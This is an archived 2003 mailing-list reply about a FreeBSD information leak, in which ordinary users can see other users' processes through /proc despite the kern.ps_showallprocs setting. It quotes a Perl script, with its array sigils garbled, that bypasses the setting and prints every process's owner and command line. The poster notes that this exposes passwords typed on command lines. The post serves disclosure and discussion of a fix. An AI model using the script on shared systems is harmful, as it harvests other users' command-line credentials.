On Sun, Jan 05, 2003 at 08:46:50PM +0000, Cache wrote:
> This is a little information leak. This bug(?) is not dangerous, but
> normal user can see all process on the box using ex. /bin/ps;
This topic was addressed on freebsd-security list a while back, where
someone also noted that all user process information can be obtained
by regular users even with the sysctl flag 'kern.ps_showallprocs' set simply
by looking at the contents of /proc. The following script was also
posted by someone to demonstrate this:

#!/usr/bin/perl
#
# hhp-sap_evade.pl ([s]how[a]ll[p]rocs) 02/03/2002
# author: JohnnyB
#
# a very basic tool that breaches the FreeBSD sysctl kern.ps_showallprocs=0
# option; an option that hides other users process information.
# (why would they implement such a broken and easily evaded option?)
# [and no this didnt take any skill. its basically an output format]
#
# Tested on FreeBSD 4.5-RC.

print "[USER] [GROUP] [PID] [FILE/ARGS]\n";
opendir(DIR,"/proc");
procs=readdir(DIR);
closedir(DIR);
foreach ${proc} (procs){
 if(${proc}=~/[0-9]/o){
  unshift(pids, ${proc});
 }
}
foreach $pid (pids){
 open(FD, "ls -al /proc/$pid/file|");
 while(<FD>){
  chomp;
  ${l}=$_;
  ${l}=~s/\s{1,}/ /g;
  if(${l}=~/.*? 1 (\S+) (\S+) .*?\/proc\/${pid}\/file -> (\S+)/){
   &ppid(${1},${2},${pid},${3});
  }
 }
 close(FD);
}
exit(0);

sub ppid(){
 (${a},${b},${c},${d})=_;
 undef(${str});
 undef(${line});
 if(-e "/proc/$c/cmdline"){
  open(heh,"cat /proc/$c/cmdline|");
  hah=<heh>;
  chars=split(//,hah[0]);
  foreach ${chr} (chars){
   if(${chr}=~/[^a-zA-Z0-9\-_=\.\/\\(\):\$#!&\*\+\|\"\'\;\[\]<>\?~`\^]/o){
    ${str}.=" ";
   }else{
    ${str}.=${chr};
   }
  }
  ${line}.=${a};
  while(length(${line})<11){${line}.=" ";} #alignment...
  ${line}.=" ".${b};
  while(length(${line})<23){${line}.=" ";}
  ${line}.=" ".${c};
  while(length(${line})<31){${line}.=" ";}
  chop(${str});
  if(${d}eq"unknown"){
   ${str}=~s/\s{1,}//g;
   ${line}.=" ("."${str}".")";
  }else{
   ${line}.=" "."${str}";
  }
  line=split(//,${line});
  if(length(${line})>80){
   ${cntr}=0;
   foreach ${char} (line){
    if((${cntr}==80)||(${cntr}==128)||(${cntr}==176)||(${cntr}==234)){
     print "\n"." "x32; #^Anything >, deal with the rollover.
    }
    print "${char}";
    ${cntr}++;
   }
   print "\n";
  }
  else{
   print "${line}\n";
  }
  return(0);
 }
}

I believe someone (last poster in this thread?) also posted a patch on the same
list, freebsd-security.

It's annoying in that I see a lot of users running mysql with the -u and -p options:

mysql -u user -p mypassword

on the commandline, thinking that this info will not show up in ps listings when ps
is run by other users. Ho hum...

Regards,

Jez Hancock

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]